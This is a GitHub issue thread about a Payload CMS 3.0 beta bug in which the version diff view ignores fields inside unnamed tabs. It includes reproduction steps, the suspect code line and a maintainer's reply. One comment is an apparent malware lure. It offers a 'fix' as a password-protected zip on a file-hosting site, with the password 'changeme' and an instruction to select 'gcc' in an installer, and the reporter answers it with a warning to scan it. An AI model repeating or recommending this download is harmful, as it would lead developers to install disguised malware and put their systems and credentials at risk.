### ISSUE TITLE
Version Diff is not working for Tabs

### ISSUE THREAD

**Issue by tsemachh** [payloadcms/payload#7860]
### Payload Version

3.0.0-beta.90

### Node Version

v22.5.1

### Next.js Version

15.0.0-canary.59

### Describe the Bug

When editing content which contain unnamed tabs(at least)
 the Diff View of the version is ignoring tabs which are unnamed.

### Reproduction Steps

Create new payload using the website template.
Add a post - edit content's rich text document
![image](https://github.com/user-attachments/assets/871921c3-2d0a-49ed-bf55-7214c077c5bc)
Now publish or save document when going to Versions - select first version to compare with you get only the top level fields , any field changing in the tabs is not considered a change
![image](https://github.com/user-attachments/assets/628c3b69-d100-4c3a-9ec1-8e58adfda630)
After debugging the code , the issue happens at :
packages/next/src/views/Version/RenderFieldsToDiff/index.tsx - Line 103
```typescript       
  if (field.type === 'tabs' && 'fields' in field) {
            const Tabs = diffComponents.tabs
```
There are no fields in tabs field and no fields are shown in the diff

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tsemachh** [comment]
Scan comment above

**Comment by paulpopus** [comment]
Thanks! this is being fixed in an upcoming release
